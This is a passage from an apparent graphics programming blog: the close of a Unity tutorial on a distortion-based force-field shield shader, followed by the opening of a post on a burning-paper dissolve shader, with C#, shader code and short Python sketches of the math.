Now that we have the basics down, it’s time for us to decide how we should go about modifying our screen uvs. Unless you’re going for some sort of drug trip / dream sequence effect, performing arithmetic on the uvs alone is likely not going to cut it. Today we’re going to create a secondary screen buffer (the “shield” buffer), and draw our shield(s) into it using a replacement shader. We’ll then use the contents of that buffer to deform our screen uvs.

But before we get to the replacement shader, let’s just render our shield as is into the secondary buffer (to make sure the buffer is working at all).

We’re going to be modifying our C# script again. We need to create the second render texture for the shield, but we don’t need this one to be at full screen res, since we aren’t going to be actually using it for colours in the framebuffer, and it’s much lighter on your GPU to only draw into the smaller buffer (the code below uses a quarter of the screen resolution on each axis, so one sixteenth of the pixels). Then we need to set up our camera, and get it rendering into this buffer. Here’s what that looks like:

RenderTexture shieldRT;
RenderTexture screenRT;
Camera distortCam;
Camera mainCam;
Material effectMaterial;

void Awake()
{
    //the main camera still renders its depth into this texture, so it needs a depth buffer
    screenRT = new RenderTexture(Screen.width, Screen.height, 16, RenderTextureFormat.Default);
    screenRT.wrapMode = TextureWrapMode.Repeat;

    shieldRT = new RenderTexture(Screen.width/4,Screen.height/4,0, RenderTextureFormat.Default);
    shieldRT.wrapMode = TextureWrapMode.Repeat;

    effectMaterial = new Material(Shader.Find("Custom/Composite"));

    mainCam = GetComponent<Camera>();
    mainCam.SetTargetBuffers(screenRT.colorBuffer, screenRT.depthBuffer);

    distortCam = new GameObject("DistortionCam").AddComponent<Camera>();
    distortCam.enabled = false;
}

void OnPostRender()
{
    distortCam.CopyFrom(mainCam);
    distortCam.backgroundColor = Color.grey;
    distortCam.cullingMask = 1 << LayerMask.NameToLayer("Shield");
    distortCam.targetTexture = shieldRT;
    distortCam.Render ();

    effectMaterial.SetTexture("_DistortionTex", shieldRT);
    Graphics.Blit(screenRT, null, effectMaterial);
}

If you run this now (and make the shieldRT public), you’ll be able to see that we are successfully drawing into our shield buffer, but our effect shader isn’t doing anything useful with that data yet, so let’s look at that next. For this initial step, let’s modify the composite shader to simply subtract the G and B values of the distortion texture from the screen uvs:

sampler2D _DistortionTex;
fixed4 frag(vOUT i) : COLOR
{
    fixed4 distort = tex2D(_DistortionTex, i.uv);
    fixed4 tex = tex2D(_MainTex, float2(i.uv.xy - (distort.gb - 0.5)));
    return tex;
}

If you hit run now, this is what the sample scene should look like:

Not exactly what we’re after - but at least it’s interesting!

Now that we’ve proven that the secondary buffer is working, it’s time to think about how we want our shield to look. When I think of a force field, I think of it as energy repelling things away from whatever is inside the shield. So I think I’d like my shield to communicate that visually. Let’s shift the UVs on the edge of the shield away from the center of the circle.

To do this, we’re going to use a replacement shader, which is going to swap the shader on our shield bubbles when they’re rendered by our distortion camera. This will let us write the data we need to our secondary buffer without changing how the bubble looks in game.

Let’s use the following as a starting point:

CGPROGRAM
#pragma vertex vert
#pragma fragment frag
#include "ShieldEffect.cginc"

struct vIN
{
    float4 vertex : POSITION;
    float2 texcoord : TEXCOORD0;
    float3 normal : NORMAL;
};

struct vOUT
{
    float4 pos : SV_POSITION;
    float3 oPos : TEXCOORD0;
    float3 wPos : TEXCOORD1;
    float3 wNorm : TEXCOORD2;
    float3 objPos : TEXCOORD3;
};

sampler2D _MainTex;

vOUT vert(vIN v)
{
    vOUT o;
    o.pos = mul(UNITY_MATRIX_MVP, v.vertex);
    float3 zeroPos = mul(UNITY_MATRIX_MVP, float4(0.0,0.0,0.0,1.0));
    o.wPos = mul(_Object2World, v.vertex);				
    o.wNorm = normalize(mul(fixed4(v.normal, 0.0), _World2Object).xyz);
    o.objPos = v.vertex.xyz;
    o.oPos = normalize(o.pos.xyz - zeroPos.xyz);

    return o;
}

fixed4 frag(vOUT i) : COLOR
{
    fixed4 tex = fixed4(i.oPos.x,0.0,i.oPos.y, 1.0);
    float intensity = CalcShieldIntensity16(i.objPos);

    float3 viewdir = normalize(_WorldSpaceCameraPos - i.wPos);
    float ang = 1.0- dot(viewdir, i.wNorm) + intensity;

    return (tex *  ang) + 0.5;
}
ENDCG

Before we go about plumbing this in to our game, let’s talk about what’s going on here. First, since we want our effect to look the same no matter what angle we’re viewing from, it simplifies a lot of things if we work in screenspace for generating the actual colours that we’re writing to the buffer. What we want is for the colours we write to be representative of their direction from the center of the shield, so to do that, we transform the origin point of the object (the zeroPos variable) into screen space as well, and then subtract that point from our vertex’s position in screen space. This gives us a nice direction vector to work with.

In the fragment shader, we turn this direction vector into a colour, and we use a rim light calculation to attenuate the colours towards the center of the shield (since the normals for the center of the screen space sphere will always point towards the camera). Then we add 0.5 to everything, so that we can use this buffer to distort things in both directions in U,V space (since you can’t write a negative colour into a buffer). This means that any pixel in the buffer which is written out as 128,128,128 will do nothing, while values above and below that push the UVs in opposite directions.

Finally, we add the intensity calculation to our fragment so that our impacts can distort more along their edges. This obviously won’t be 100% accurate because the direction of the distortion isn’t really being taken into account, but it creates a good looking effect anyway. You could spend more time making sure that the impact bubbles distort in a consistent way out from their center, but for brevity’s sake I’m not going to in this post.
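The add 0.5 trick is easier to see with numbers. Here’s a sketch in plain C# of one channel being written by the replacement shader and read back when we distort the screen. The names are hypothetical, and ToByte assumes an 8 bit per channel render target:

```csharp
using System;

public static class OffsetEncoding
{
    // Shader side: scale a signed direction component and re-centre it on 0.5.
    public static float Encode(float direction, float strength)
    {
        return direction * strength + 0.5f;
    }

    // Composite side: subtract the 0.5 again to get the signed offset back.
    public static float Decode(float channel)
    {
        return channel - 0.5f;
    }

    // What an 8 bit channel would actually store (values outside 0 to 1 are clamped).
    public static int ToByte(float channel)
    {
        float clamped = Math.Max(0f, Math.Min(1f, channel));
        return (int)Math.Round(clamped * 255f);
    }
}
```

A direction of 0 encodes to 0.5, which is stored as 128 and decodes back to an offset of 0, so nothing moves. A direction of -0.25 is stored as 0.25 and decodes to -0.25. Anything that would land outside of 0 to 1 is clamped when it’s written, so the largest offset the buffer can hold is 0.5 in either direction, and that is what the replacement shader is packing into its colour channels for every shield pixel.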

This is going to give us a shield buffer that looks something like this (assuming 2 shields on screen):

Now all we need to do is get the replacement shader working. Just get the shader into your script the same way we loaded in the Composite shader, and make this really simple 1 line change to the Render call in OnPostRender:

distortCam.RenderWithShader(shieldReplacementShader, null);

And with that, we should have the following!

Note that you may find that the effect is too intense even with the replacement shader (this is extremely noticeable if you’re working with the scene I gave you at the beginning of the article). In that case you may want to tone down the intensity of the effect by adding a multiplication into the composite shader:

//the replacement shader writes its direction into the red and blue channels
fixed4 tex = tex2D(_MainTex, float2(i.uv.xy + (distort.rb - 0.5) * 0.1 ));

If you’re following along at home, your sample scene should look like this if you grab your shield and move it around:

You may also notice that the edges of your shield bubble are now a little bit jagged. This is because we’re rendering to a smaller buffer for the shield effect. This can be alleviated by increasing the size of the shield renderTexture (which is EXTREMELY expensive), or doing some sort of blur operation on your shield buffer (probably less expensive). However we’re not going to worry about it today because by the end of the article we’re going to have an approach that hides this jagginess.

This is great and all, but now our shield looks all weird since we’re distorting the UVs that it’s being drawn with too. I’d like to preserve the nice plasma texture on the shield, so I’m going to move the actual rendering of the shield to a different camera, and make sure the camera that we’re distorting the UVs on doesn’t see objects on the shield layer. This is really easy to do, but will leave us with a different problem. We’ll get to that in a second.

First, let’s modify our C# effect script to create this new camera for us:

RenderTexture shieldRT;
RenderTexture screenRT;
Camera distortCam;
Camera mainCam;
Camera shieldCam;

Shader shieldReplacementShader;
Material effectMaterial;

void Awake()
{
    //the main camera still renders its depth into this texture, so it needs a depth buffer
    screenRT = new RenderTexture(Screen.width, Screen.height, 16, RenderTextureFormat.Default);
    screenRT.wrapMode = TextureWrapMode.Repeat;

    shieldRT = new RenderTexture(Screen.width/4,Screen.height/4,0, RenderTextureFormat.Default);
    shieldRT.wrapMode = TextureWrapMode.Repeat;

    shieldReplacementShader = Shader.Find("Custom/Replacement");
    effectMaterial = new Material(Shader.Find("Custom/Composite"));

    mainCam = GetComponent<Camera>();
    mainCam.SetTargetBuffers(screenRT.colorBuffer, screenRT.depthBuffer);
    mainCam.cullingMask &= ~(1 << LayerMask.NameToLayer("Shield"));

    distortCam = new GameObject("DistortionCam").AddComponent<Camera>();
    distortCam.enabled = false;

    shieldCam = new GameObject("Shield Cam").AddComponent<Camera>();
}

void Update()
{
    shieldCam.clearFlags = CameraClearFlags.Depth;
    shieldCam.depth = mainCam.depth + 1;
    shieldCam.transform.position = mainCam.transform.position;
    shieldCam.transform.rotation = mainCam.transform.rotation;
    shieldCam.cullingMask = 1 << LayerMask.NameToLayer("Shield");
    shieldCam.fieldOfView = mainCam.fieldOfView;
    shieldCam.orthographic = mainCam.orthographic;
    shieldCam.orthographicSize = mainCam.orthographicSize;
}

void OnPostRender(){...}

Notice that we also added a line to remove the Shield layer from the main camera’s culling mask. Now that we have a second camera drawing the shields for us, the main camera doesn’t need to spend draw calls rendering the shield colour incorrectly.

With this change, our shield looks a lot better, but like I said, this has exacerbated another problem we have. Earlier we accepted that our distortion effect wasn’t going to have depth information, and therefore would distort things in front of the shield, but now, we also don’t have depth information for the shield colour itself, which means that shields will render on top of everything else. This is much more noticeable, and makes this effect really unwieldy, so we’re going to have to do something about that.

From Full Screen Effect to Projective Texturing

Buckle up, things are about to get fun.

All the problems that we have right now are due to us treating the shields like they aren’t geometry: we’re rendering them to a buffer to distort the whole screen, and then using a secondary camera which has no depth information to paste them over the rest of the game. Wouldn’t it be great if we could use our depth buffer to occlude both the distortion and colours of the shield?

In the past, I’ve seen this done by manually calculating a depth pass, but this is expensive and requires you to double the draw calls of everything you want included in the depth buffer that you’re going to use to occlude your warp effect; so instead of doing that, here’s what we’re going to do today:

1. Render the main camera (without warp) to a render texture
2. Render the multi colored shield buffer as usual
3. Copy the main camera render texture to the buffer that the shield camera will draw into
4. Share a depth buffer between our main camera and our shield camera so that our shields are occluded properly without incurring extra draw calls
5. Continue to render our shields after everything else, but pass the main camera render texture to our shield shaders, and let them deal with the warp effect themselves so that when the shield is occluded, the warp effect is occluded too
6. Blit the shield camera render texture to the screen

It’s a lot of changes, but at the end of the day we’re going to end up with a really really easy to use shield bubble effect that behaves exactly like we expect it should without incurring extra draw calls or doing a lot of extra full screen operations. So without further ado, let’s take it from the top!

Rendering the main camera to a render texture

The first part of this list should be pretty easy after all the work with render textures we did above. In fact we’re already rendering the main camera to a render texture (the screenRT) so we’re actually in good shape.

First of all, we need to stop our main camera from blitting to the screen, and we need to set our offscreen buffer to a global shader uniform so we can access it later. We’re going to change the OnPostRender function in our C# script from this:

void OnPostRender()
{
    ...
    effectMaterial.SetTexture("_DistortionTex", shieldRT);
    Graphics.Blit(screenRT, null, effectMaterial);
}

To this:

void OnPostRender()
{
    ...
    Shader.SetGlobalTexture("_DistortionBuffer", shieldRT);
    Shader.SetGlobalTexture("_ScreenBuffer", screenRT);

    Graphics.Blit(screenRT, finalRT);
}

One important thing to note here is that if you want objects which have warp to be seen through each other, you’re going to have to render them to this buffer. For our shields, the easiest way to do this is to create a duplicate shield sphere, assign it the optimized (non warp) shader, child it to the original shield sphere and make sure it isn’t on the Shield layer. This isn’t going to work in all cases, but it will for our purposes today.

Notice that we’re no longer going to be setting properties of the composite material. This is because with our new approach, the composite material’s logic is going to be handled by the shield shader, so we don’t actually need the composite any more.

You may also have noticed that the code above references a new RenderTexture. About that:

Two New RenderTextures

Steps three and four of our new technique hint at some new render textures that we’re going to need. The first of these is our finalRT, the render texture that the camera rendering our warp objects will write into. We’ve already got the code to copy our main camera’s output into that texture like we said we’d do, but we still need to set the render texture itself up. We also need a render texture specifically for storing the depth buffer from the main camera, so that we can share it with our shield camera as well.

Our new Awake function should look like the following:

RenderTexture shieldRT;
RenderTexture screenRT;
RenderTexture finalRT;
RenderTexture depthRT;
Camera distortCam;
Camera mainCam;
Camera shieldCam;

Shader shieldReplacementShader;
Material effectMaterial;

void Awake()
{
    screenRT = new RenderTexture(Screen.width, Screen.height, 0, RenderTextureFormat.Default);
    screenRT.wrapMode = TextureWrapMode.Repeat;

    finalRT = new RenderTexture(Screen.width, Screen.height, 0, RenderTextureFormat.Default);
    finalRT.wrapMode = TextureWrapMode.Repeat;

    depthRT = new RenderTexture(Screen.width, Screen.height, 16, RenderTextureFormat.Depth);
    depthRT.wrapMode = TextureWrapMode.Repeat;

    shieldRT = new RenderTexture(Screen.width/4,Screen.height/4,16, RenderTextureFormat.Default);
    shieldRT.wrapMode = TextureWrapMode.Repeat;

    shieldReplacementShader = Shader.Find("Custom/Replacement");

    mainCam = GetComponent<Camera>();
    mainCam.SetTargetBuffers(screenRT.colorBuffer, depthRT.depthBuffer);
    mainCam.cullingMask &= ~(1 << LayerMask.NameToLayer("Shield"));

    distortCam = new GameObject("DistortionCam").AddComponent<Camera>();
    distortCam.enabled = false;

    shieldCam = new GameObject("Shield Cam").AddComponent<Camera>();
    shieldCam.SetTargetBuffers(finalRT.colorBuffer, depthRT.depthBuffer);
}
...

Excellent! Now we have to make sure that our shieldCam is set to not clear anything before it renders, since we are now very deliberately populating its buffers with data from our main camera:

void Update()
{
...
    shieldCam.clearFlags = CameraClearFlags.Nothing;
...
}

And finally, you may notice that we’re not actually drawing anything to the screen anymore. We need to tell our shieldCam that it’s cool to render everything to the frame buffer when it’s done. I like to keep as much of the logic for an effect within the same script as I can, so I did this by adding a new function to our effect script, and putting a component on the shield camera to call this inside its OnPostRender call. You can find a scene with everything set up like this in the code dump at the end of the article.

public void BlitToScreen()
{
    Graphics.Blit(finalRT, (RenderTexture)null);
    screenRT.DiscardContents();
    finalRT.DiscardContents();
    shieldRT.DiscardContents();
}

Notice that we also discard the contents of our render textures in this function, which tells Unity that we don’t need them preserved once the frame has been blitted.
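The component on the shield camera can be tiny. Here’s one way it could look. This is my guess at a minimal version, not necessarily what’s in the project download, and the PostRenderCallback name and its onPostRender field are hypothetical. It relies on Unity calling OnPostRender on scripts attached to the same GameObject as a camera once that camera has finished rendering:

```csharp
using System;
using UnityEngine;

// Hypothetical helper: attach this to a camera to be told when it has finished rendering.
public class PostRenderCallback : MonoBehaviour
{
    // Assigned from code by whoever wants the notification (not serialized by Unity).
    public Action onPostRender;

    void OnPostRender()
    {
        if (onPostRender != null)
        {
            onPostRender();
        }
    }
}
```

You’d hook it up in Awake, right after creating the shield camera, with something like shieldCam.gameObject.AddComponent<PostRenderCallback>().onPostRender = BlitToScreen;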

Warping Inside our Fragment Shaders

There’s one last thing we need to do to finish this effect, and that’s to move the logic that used to live in our composite shader to the shader we use to draw our shields. There’s a completed shader at the end of this article but all we’re doing is adding uniforms to the shader so we can see the screenRT and shieldRT (the warp buffer), and then filling in areas of our object that would be transparent if we were alpha blending with a distorted lookup into screenRT. The addition to the fragment shader looks like this:

fixed4 frag(v2f i) : SV_Target
{
    float3 viewdir = normalize(_WorldSpaceCameraPos - i.worldPos);
    float ang = 1 - (abs(dot(viewdir, normalize(i.normal))));
    half4 rimCol = _RimColor * pow(ang, _RimPower) * _RimIntensity;

    half4 texColor = tex2D(_MainTex, i.texcoord);
    fixed4 tex =  rimCol * texColor;

    float4 screen = ComputeScreenPos(i.objectPos);
    fixed4 distortion = tex2Dproj(_DistortionBuffer, UNITY_PROJ_COORD(screen));

    float4 screenPos = screen;				
    screenPos.xy =  screenPos.xy - (distortion.rb - 0.5) * 1.5;

    float4 d = tex2Dproj(_ScreenBuffer, UNITY_PROJ_COORD(screenPos));
    return  tex + d + texColor * CalcShieldIntensity16(i.oPos);
}

The ComputeScreenPos function and the UNITY_PROJ_COORD macro do most of the hard work for us here, but you can see where we’ve basically lifted the logic completely from the composite shader and added it here. This is going to make our 100% opaque objects look like they’re alpha blending with a warp effect. It also lets our warp effect be occluded by geometry and by other warp effects, and if you took my advice and wrote out a non warp version of the shield to the main camera, you can see one shield through another. All of this put together might look something like this:

When you look at the final shader I have posted in the google drive, you’ll also notice that I’ve added a second pass to it so that we can properly show the shield impacts on the side of the shield behind the ship we’re looking at. I skipped over the distortion effect in that pass to make it a bit more performant, but I wanted to keep the shield impacts so that the player could see all the directions they were being shot at from. Again, this is open to interpretation, as it does make the shader much more expensive.
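If the ComputeScreenPos and tex2Dproj pair in the fragment shader above looks like magic, here’s a sketch of the maths in plain C#. It follows my understanding of the helper in UnityCG.cginc, which expects a clip space position, ignores the vertical flip Unity applies on some platforms, and uses hypothetical names:

```csharp
public static class ScreenPos
{
    // Rough equivalent of ComputeScreenPos: remaps clip space x and y from [-w, w] to [0, w].
    // Returns { x, y, w }; the divide by w is deliberately left for later.
    public static float[] FromClip(float clipX, float clipY, float clipW)
    {
        return new float[] { clipX * 0.5f + clipW * 0.5f, clipY * 0.5f + clipW * 0.5f, clipW };
    }

    // Rough equivalent of what tex2Dproj does before sampling: divide by w to get a 0 to 1 UV.
    public static float[] ProjectToUV(float[] screenPos)
    {
        return new float[] { screenPos[0] / screenPos[2], screenPos[1] / screenPos[2] };
    }
}
```

A point in the middle of the view ends up at UV (0.5, 0.5) whatever its w is. Notice that the shader subtracts the distortion from screenPos.xy before the divide, so an offset of 0.5 on a fragment with w = 5 only moves the lookup by 0.1 in UV space. With a perspective camera that means the further away the shield is, the smaller the warp gets.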

And At last, that’s everything!

How Expensive Is This

So the inevitable question that’s always (rightly) asked about cool graphics code is “how expensive is it?” So before we wrap up for today, let’s do a quick performance analysis of our new shield versus the original shield posted and figure out exactly what using either of them means for our performance. Since virtually all my Unity experience is on mobile, let’s look at this like our intended target is a mobile device.

On the draw call front, the original shader from Warfleet comes in the lowest, with a single draw call. This is followed by my optimized version of the shader, which I added a draw call to so that we could render the inside/back face of the sphere’s impacts as well. Our post effect version comes in last, with a draw call to render the shield to our buffer, and 1 draw call per side of the shield that we’re rendering.

It’s worth noting that if all you’re looking for is a more performant version of the original effect, you could remove the back face pass in the optimized version and be there.

Finally, I’ve set up a small test scene to see what the on device cost of the effect is. The scene is simple enough, whenever I tap the screen I spawn another instance of the shield and offset it a bit from the first one. I’ve turned on the on board profiler on an iPhone 6 to grab the performance data over time. It’s not a perfect test, but the test scene is consistent across every shader so at least the numbers will be useful. Here are the results:

Remember that these results are on a Metal capable device (which means the cost of a draw call is lower than you’d see on OpenGL), so these numbers are only useful relative to each other, and not as an absolute measure of the cost of these shaders on any device except the iPhone 6.

Conclusion

That should do it. As said above, the source for everything here can be found on google drive here. Hopefully this has been helpful enough that you don’t feel limited to just making sci fi shields, but feel like you can go forth and create refraction shaders, heat haze, whatever!

If you have any questions about anything, spot a mistake, or just want to say hi, send me a message on twitter.

Happy shading!

A Burning Paper Shader

2015-11-10T00:00:00+00:00

After a long hiatus, I’ve decided to start posting again! And I can think of no better way to kick that off than with revisiting a cheesy old shader that I posted 2 years ago.

So today we’re revisiting the “Dissolve” shader effect. I’ve seen this effect pop up more and more lately, mostly on 2D elements (like in Hearthstone and Armello), so today we’re going to see what we can get working on a plane, and then torch an unsuspecting 3D fence.

Ok, enough intro! Let’s take a look at what we’re building:

Breaking things down

To start, let’s get the core part of the effect down: dissolving a mesh based on a texture. This is the easiest part to get right, since there really isn’t any need for artistic interpretation. You probably noticed that the above gif starts dissolving from one point and works its way across the quad. We’ll get to that, but let’s dissolve the entire quad uniformly first. Like so:

All we need to achieve this is a texture to use as our dissolve control texture. This can be anything (and in some cases using the diffuse texture of the object yields really cool results), but for the most general purpose control texture, use a smoothed noise texture. You can google around for these, or create your own. One thing you’re going to want to look for is one with a reasonably good contrast, which is going to give you a really nice range for your dissolve effect.

Before we write any code, let’s get our math sorted out first. We want to expose a constant value which controls the dissolve effect (0 for completely dissolved, 1 for totally not dissolved), which I’m going to refer to as _DissolveValue for the rest of the post. Then we need to look up the colour value in the control texture for the fragment we’re currently shading and add that value to _DissolveValue. This gets us the following:

Before the effect starts (_DissolveValue == 1), at pure black in the noise texture, our sum will be 1
When the effect ends (_DissolveValue == 0), at pure white in our noise texture, our sum will be 1

Since we want to make sure that at the end, every pixel is transparent, we need to clamp our noise value to a maximum of 0.99, which will allow us to make the blanket statement that we can set any pixel whose sum is < 1 to transparent.

As a fragment function, the above logic might look like this:

fixed4 frag(vOUT i) : COLOR
{
   fixed4 mainTex = tex2D(_MainTex, i.uv);
   fixed noiseVal = tex2D(_NoiseTex, i.uv).r;
   mainTex.a *= floor(_DissolveValue + min(0.99, noiseVal));
   return mainTex;
}
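
If you want to sanity check the threshold logic off the GPU, here is a minimal Python sketch of the same sum-and-floor. The function name is hypothetical and the inputs are plain floats standing in for _DissolveValue and the noise sample; it only mirrors the math, not the texture lookups.

```python
import math


def dissolve_alpha(dissolve_value, noise):
    """Return 1.0 for a visible fragment and 0.0 for a dissolved one.

    Mirrors floor(_DissolveValue + min(0.99, noise)) from the fragment function.
    """
    return float(math.floor(dissolve_value + min(0.99, noise)))


# Untouched mesh: even pure black noise survives when the value is 1.
print(dissolve_alpha(1.0, 0.0))
# Fully dissolved: even pure white noise is clamped to 0.99 and floors to 0.
print(dissolve_alpha(0.0, 1.0))
```

The clamp is what makes the second case work: without it, pure white noise at a dissolve value of 0 would sum to exactly 1 and stay visible.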

For brevity’s sake I’m going to omit posting the whole shader source as we work through it, but the full source is at the bottom of this article so if you’re stuck just jump down there and fill in any blanks.

The Edge Details

Ok, so we have our basic effect now, but it doesn’t really look like anything other than a janky shader effect, and I’ve found that in general “janky shader” isn’t high up on the things commonly asked for by artists. Let’s add some colour to the edges of the dissolve effect.

To do this, we’re going to use a gradient to control the colours of the edge, and we’ll use the alpha channel of that gradient to control our fragment’s alpha as the effect progresses. The leftmost pixel in the gradient will be our fully dissolved value, with an alpha of 0, while the rightmost pixel will be a completely untouched pixel with alpha of 1 and a colour value of white. What you put in between these two values is up to you, but for the effect I’m building, my gradient looks like this:

Instead of multiplying our alpha as we did before, this time we’re going to multiply the entire colour value of our pixel by a point in our gradient. As before, we want to make sure that a _DissolveValue of 1 is a fully untouched mesh, and when it’s 0, we have a fully transparent mesh. This changes our requirements for our math a little bit since we can’t just floor the sum and get a hard line between 1 and <1. We need to make sure that when _DissolveValue is 1, we are at an X value of 1, regardless of our noise texture, but we still want to make sure that at a _DissolveValue of 0 that we’re at an X value of 0 regardless of the value in our noise texture.

This might sound tricky, but it isn’t as long as you set the wrap mode of your gradient to “clamp,” so that lookups at or past either end of the 0 to 1 range read the edge pixels instead of wrapping around. Provided that’s set up correctly, the following will work just fine:

fixed4 frag(vOUT i) : COLOR
{
   fixed4 mainTex = tex2D(_MainTex, i.uv);
   fixed noiseVal = tex2D(_NoiseTex, i.uv).r;

   fixed d = (2.0 * _DissolveValue + noiseVal) - 1.0;
   fixed overOne = saturate(d * _GradientAdjust);

   fixed4 burn = tex2D(_BurnGradient, float2( overOne, 0.5));
   return mainTex * burn;
}
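
As a quick check on the two endpoint requirements, here is a hedged Python sketch of just the gradient coordinate calculation. The function names are made up for illustration, and the default of 2.0 for the adjust parameter is simply the value used later in this post.

```python
def saturate(x):
    """Clamp to the 0..1 range, like the shader intrinsic of the same name."""
    return max(0.0, min(1.0, x))


def gradient_x(dissolve_value, noise, gradient_adjust=2.0):
    """X coordinate used to sample the burn gradient."""
    d = (2.0 * dissolve_value + noise) - 1.0
    return saturate(d * gradient_adjust)


# At both ends of the effect the noise value no longer matters.
for noise in (0.0, 0.5, 1.0):
    print(noise, gradient_x(1.0, noise), gradient_x(0.0, noise))
```

Doubling _DissolveValue is what buys the guarantee: at 1 the sum is at least 2 before the subtraction, and at 0 it is at most 1, so d lands at or beyond the ends of the gradient in both cases.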

The _GradientAdjust parameter isn’t necessary to make the effect work, but it provides a great deal of control over how tight you want the edges of your effect to be (just make sure that its value is greater than 1). I found that with the gradient I was using, setting that parameter to 2 produced reasonably good results, which looked like this:

Notice that in the gif above, nothing really happens until we hit about _DissolveValue 0.5. This is dependent on the range of your noise texture: a higher contrast texture will show dissolve effects starting earlier and ending later.

Making This Useful

What we have right now looks pretty good, but it isn’t very useful. I think it’s safe to say that in almost every situation where this effect would look good, it would look way better if the effect came from one direction, or for our purposes today, started at a specific point.

Since we want the dissolve effect to radiate out from a point, what we need to do is define a function which will:

Return 1 when _DissolveValue is 1
Return 0 when _DissolveValue is 0
Return a value between 0 and 1 which approaches 0 as the distance to our origin point decreases

Let’s start from the obvious place and just add the distance to our previous calculation:

GradientXCoord = ((2.0 * _DissolveValue + NoiseTextureValue) * DistanceToPoint) - 1.0

This is as good a place to start as any, but we’re no longer guaranteed to return 1 when _DissolveValue is 1, and if the distance is > 1, the effect gets way less predictable.

The distance problem is probably what you’ll care about more at first, since it makes the _DissolveValue almost useless unless either your distance to the hit point is exceedingly small, or your _DissolveValue is exceedingly small. What we really want is for our distance value to have a range of 0 to 1 as well, which means we need a value to scale our distance by.

Through experimenting a bit, I’ve found that I get pretty good results with the largest distance between any 2 points on the mesh (in object space) divided by 2. As long as your origin point is on your mesh, just divide the distance from each fragment to the origin point by the max distance we’ve calculated to get a much nicer (although not strictly 0.0 - 1.0 in all cases) value.

You can calculate this scaling value with something like this attached to the object you want to use this shader with:

void Start()
{
   float maxVal = 0.0f;
   Material dissolveMaterial = GetComponent<Renderer>().material;
   var verts = GetComponent<MeshFilter>().mesh.vertices;
   // Brute force search for the two vertices that are farthest apart.
   for (int i = 0; i < verts.Length; i++)
   {
      var v1 = verts[i];
      // Start at i + 1 so each pair is only measured once.
      for (int j = i + 1; j < verts.Length; j++)
      {
         float mag = (v1 - verts[j]).magnitude;
         if (mag > maxVal) maxVal = mag;
      }
   }
   dissolveMaterial.SetFloat("_LargestVal", maxVal * 0.5f);
}
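
If you would rather precompute the value offline, the same search is easy to sketch in Python. This is only an illustration: the function name is made up, and the vertex list is assumed to be a plain list of (x, y, z) tuples in object space.

```python
import itertools
import math


def half_max_distance(verts):
    """Half of the largest distance between any two vertices."""
    largest = 0.0
    # combinations() visits each unordered pair exactly once.
    for a, b in itertools.combinations(verts, 2):
        largest = max(largest, math.dist(a, b))
    return largest * 0.5


# A 1 x 1 quad centered on the origin: the longest span is the diagonal.
quad = [(-0.5, -0.5, 0.0), (0.5, -0.5, 0.0), (-0.5, 0.5, 0.0), (0.5, 0.5, 0.0)]
print(half_max_distance(quad))
```

Like the script above, this compares every pair of vertices, so it is fine for a quad or a fence but gets slow on dense meshes.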

Using this value, we can modify our fragment function to look like so:

fixed4 frag(vOUT i) : COLOR
{
   fixed4 mainTex = tex2D(_MainTex, i.uv);
   fixed noiseVal = tex2D(_NoiseTex, i.uv).r;

   fixed toPoint =  (length(i.oPos.xyz - i.hitPos.xyz) / _LargestVal);
   fixed d = ( (2.0 * _DissolveValue + noiseVal) * toPoint ) - 1.0;

   fixed overOne = saturate(d * _GradientAdjust);

   fixed4 burn = tex2D(_BurnGradient, float2(overOne, 0.5));
   return mainTex * burn;
}

This actually is pretty close to our end product, but now we have a new problem: by scaling our distance like this, we no longer can guarantee that we have a fully opaque mesh at _DissolveValue 1. What we need to do is make our divisor smaller for higher values of _DissolveValue, which can be done like so:

fixed4 frag(vOUT i) : COLOR
{
   fixed4 mainTex = tex2D(_MainTex, i.uv);
   fixed noiseVal = tex2D(_NoiseTex, i.uv).r;

   fixed toPoint =  (length(i.oPos.xyz - i.hitPos.xyz) / ((1.0001 - _DissolveValue) * _LargestVal));
   fixed d = ( (_DissolveValue + noiseVal) * toPoint ) - 1.0;

   fixed overOne = saturate(d * _GradientAdjust);

   fixed4 burn = tex2D(_BurnGradient, float2( overOne, 0.5));
   return mainTex * burn;
}
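
Here is a hedged Python sketch of that last version of the math, handy for poking at the numbers without recompiling a shader. The names are hypothetical, the distance and scaling value are passed in as plain floats, and the default adjust value of 2.0 is the one used earlier in the post.

```python
def saturate(x):
    """Clamp to the 0..1 range, like the shader intrinsic of the same name."""
    return max(0.0, min(1.0, x))


def radial_gradient_x(dissolve_value, noise, distance, largest_val,
                      gradient_adjust=2.0):
    """Gradient X coordinate for a fragment `distance` away from the hit point."""
    # The divisor shrinks as dissolve_value approaches 1, which inflates
    # to_point and keeps the mesh opaque at the start of the effect.
    to_point = distance / ((1.0001 - dissolve_value) * largest_val)
    d = (dissolve_value + noise) * to_point - 1.0
    return saturate(d * gradient_adjust)


# Start of the effect: opaque even with pure black noise, a little way from the hit.
print(radial_gradient_x(1.0, 0.0, distance=0.1, largest_val=1.0))
# End of the effect: dissolved even with pure white noise at the far edge.
print(radial_gradient_x(0.0, 1.0, distance=1.0, largest_val=1.0))
```

Note that a fragment sitting exactly on the hit point has a distance of 0 and so always maps to the dissolved end of the gradient, whatever the dissolve value is.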

Make sure that whatever number you subtract _DissolveValue from when you do this is greater than the max value that you can set _DissolveValue to, otherwise you risk dividing by 0 at some point in your effect, which can cause all kinds of problems.

With the above fragment function, you now have a perfectly good shader, but I made one additional artistic modification: I multiplied my final toPoint variable by the noise value before calculating d. This helped me avoid having a perfectly circular hole at high values of the _DissolveValue. It’s not necessary, but I think it looks a lot better.

Using the above script / shader, when I applied this shader to an object, the effect I got looked like this:

Practical Implementation Details

Although we have our shader now, we aren’t done. As with a lot of effects, this one is best when it’s driven by some additional CPU side logic. For one, where are we getting our hit point from? Wouldn’t it be awesome if we could drive that by a mouse click and start burning our paper / fence / whatever at whatever point we wanted?

To do that, let’s expand the script we used to set the max value and give it some additional logic. We also will need to modify our above start function to use the variable _dissolveMaterial instead of the one we used before, which was scoped locally to our start function. I’m going to leave that out here, but the full source is available at the end.

private float _value = 1.0f;
private bool _isRunning = false;
private Material _dissolveMaterial = null;
public float timeScale = 1.0f;

public void Reset()
{
   _value = 1.0f;
   _dissolveMaterial.SetFloat("_DissolveValue", _value);
}

public void TriggerDissolve(Vector3 hitPoint)
{
   _value = 1.0f;
   _dissolveMaterial.SetVector("_HitPos", (new Vector4(hitPoint.x, hitPoint.y, hitPoint.z, 1.0f)));
   _isRunning = true;
}

void Update()
{
   if (_isRunning)
   {
      _value = Mathf.Max(0.0f, _value - Time.deltaTime*timeScale);
      _dissolveMaterial.SetFloat("_DissolveValue", _value);
